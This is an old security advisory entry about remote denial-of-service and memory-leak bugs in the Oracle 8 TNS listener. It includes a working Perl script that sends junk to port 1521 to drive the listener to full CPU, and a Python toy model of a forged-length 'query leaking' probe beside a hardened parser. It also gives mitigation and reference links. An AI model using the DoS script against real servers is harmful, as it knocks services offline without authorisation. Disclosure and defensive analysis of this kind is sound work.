COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle 8

PROBLEM

    'r0ot' found the following.  Attached is a little Perl script which
    makes TNSLSNR80.EXE consume all available CPU time, so the computer
    becomes unusable.  It works on Oracle 8 servers running Windows NT
    4.0 (SP6) and does not require any authentication credentials to
    succeed.  This has not been tried on any other versions or
    platforms.

    #!/usr/local/bin/perl -w

    # This little script crashes Oracle 8.0 on Windows NT 4.0 (SP6):
    # TNSLSNR80.EXE will consume 100% CPU...
    #
    # by r0ot@runbox.com

    use strict;
    use IO::Socket;   # also exports the Socket constants and sockaddr_in()

    my $host = "kickme";
    # enter the hostname of the oracle-server to kick
    my $port = 1521;  # default TNS listener port

    # scalar gethostbyname() returns the packed IPv4 address
    my $addr = gethostbyname($host)
        or die "cannot resolve $host: $!\n";

    socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
        or die "socket: $!\n";
    connect($sock, sockaddr_in($port, $addr))
        or die "connect to $host:$port failed: $!\n";
    $sock->autoflush(1);

    # a bare newline instead of a TNS header, then a few chunks of junk
    # a couple of seconds apart; the listener spins on this input
    sleep(2);
    print $sock "\n";
    for (my $i = 0; $i < 3; $i++) {
            sleep(2);
            print $sock "dfsdffdfsfdggfdgdf";
            # an arbitrary, but carefully chosen constant...
    }

    close($sock);

    It works against Oracle 8.0.5 running on Linux as well...

    Rony tested it on HP-UX 11.0 and Solaris 8 running 8.0.6.  The CPU
    jumped to 100%.  However, this took a few minutes to take effect.

SOLUTION

    There were several remote DoS and general security bugs in the
    Oracle TNS listener (tnslsnr) in (at least) 8.1.6.  These were
    reported to Oracle in October 2000; 8.1.7 fixes the DoS and most of
    the other problems.  TNS 'query leaking' is still possible in 8.1.7:
    by sending tnslsnr a packet whose header declares a bogus length,
    it is possible to see the contents of previous TNS packets.  While
    this will not reveal past SQL sessions, it does show usernames and
    other oddities.  Since none of these attacks needs credentials, the
    only interim mitigation on unpatched hosts is to keep untrusted
    networks from reaching the listener port (TCP 1521 by default).
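    The 'query leaking' bug above is a length-trust problem: the listener
    believes the 2-byte length in the TNS header rather than the number of
    bytes that actually arrived.  The following Python is an added example
    written for this page, not Oracle code or anything from r0ot.  The
    8-byte TNS header layout (length, packet checksum, type, reserved,
    header checksum, big-endian) is the real one; the listener that
    reuses a single receive buffer across connections is an assumed toy
    model of the bug class, and the CONNECT payload is constructed sample
    data.  It shows the leak of a previous session's USER= string beside a
    hardened handler that rejects a declared length that does not match
    what was received.

```python
import struct

# Layout of the 8-byte TNS packet header (packet length, packet checksum,
# packet type, reserved byte, header checksum), all big-endian.
TNS_HEADER = struct.Struct(">HHBBH")
TNS_HEADER_LEN = TNS_HEADER.size          # 8
TNS_CONNECT = 1                           # CONNECT packet type
BUF_SIZE = 512                            # receive buffer of the toy listener


def build_tns_packet(ptype: int, payload: bytes) -> bytes:
    """Build a TNS packet whose length field covers header + payload.
    Checksums are left zero, which TNS 8 accepts."""
    return TNS_HEADER.pack(TNS_HEADER_LEN + len(payload), 0, ptype, 0, 0) + payload


def forge_length(packet: bytes, bogus_length: int) -> bytes:
    """Return the same packet with the declared length overwritten."""
    return struct.pack(">H", bogus_length) + packet[2:]


class ListenerModel:
    """Assumed toy model (not Oracle's code) of a listener that reuses one
    receive buffer across connections and reports the payload it received,
    e.g. in a refuse message or a trace line."""

    def __init__(self, trust_declared_length: bool):
        self.buf = bytearray(BUF_SIZE)
        self.trust_declared_length = trust_declared_length

    def handle(self, wire: bytes) -> bytes:
        n = min(len(wire), BUF_SIZE)
        self.buf[:n] = wire[:n]   # bytes past n still hold the previous packet
        if n < TNS_HEADER_LEN:
            raise ValueError("short header")
        declared, _csum, _ptype, _rsv, _hcsum = TNS_HEADER.unpack(
            self.buf[:TNS_HEADER_LEN])
        if self.trust_declared_length:
            # Vulnerable: the sender decides how much of the buffer is exposed.
            end = min(declared, BUF_SIZE)
        else:
            # Hardened: the declared length must match what actually arrived.
            if declared != n:
                raise ValueError(f"declared length {declared} != received {n}")
            end = n
        return bytes(self.buf[TNS_HEADER_LEN:end])


def run_demo():
    """Replay a legitimate CONNECT, then a probe with a bogus length,
    against the vulnerable and the hardened listener."""
    # Constructed sample CONNECT payload in the usual TNS key/value form.
    connect = build_tns_packet(
        TNS_CONNECT, b"(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(USER=scott)))")
    # 9-byte probe that claims to be 0x60 bytes long.
    probe = forge_length(build_tns_packet(TNS_CONNECT, b"x"), 0x60)

    vulnerable = ListenerModel(trust_declared_length=True)
    vulnerable.handle(connect)
    leaked = vulnerable.handle(probe)      # contains the earlier USER=scott

    hardened = ListenerModel(trust_declared_length=False)
    hardened.handle(connect)
    try:
        hardened.handle(probe)
        rejected = False
    except ValueError:
        rejected = True

    return {"leaked": leaked, "rejected": rejected}


if __name__ == "__main__":
    result = run_demo()
    print("leaked from previous packet:", result["leaked"])
    print("hardened listener rejected probe:", result["rejected"])
```

    The hardened branch is the check a parser of any length-prefixed
    protocol wants: bound every copy and every reply by the bytes actually
    read, and treat a header length that disagrees with the socket read as
    a protocol error rather than as the truth.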

        http://otn.oracle.com/deploy/security/alerts.htm
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818
        http://xforce.iss.net/alerts/advise66.php
        http://www.jammed.com/~jwa/hacks/security/tnscmd/